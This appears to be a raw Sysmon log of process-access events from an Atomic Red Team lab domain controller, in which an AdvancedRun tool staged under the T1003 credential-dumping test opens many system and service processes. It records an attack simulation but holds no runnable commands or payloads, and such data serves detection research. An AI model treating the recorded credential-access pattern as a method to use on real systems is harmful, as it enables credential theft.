10341000x80000000000000003943990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003943972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 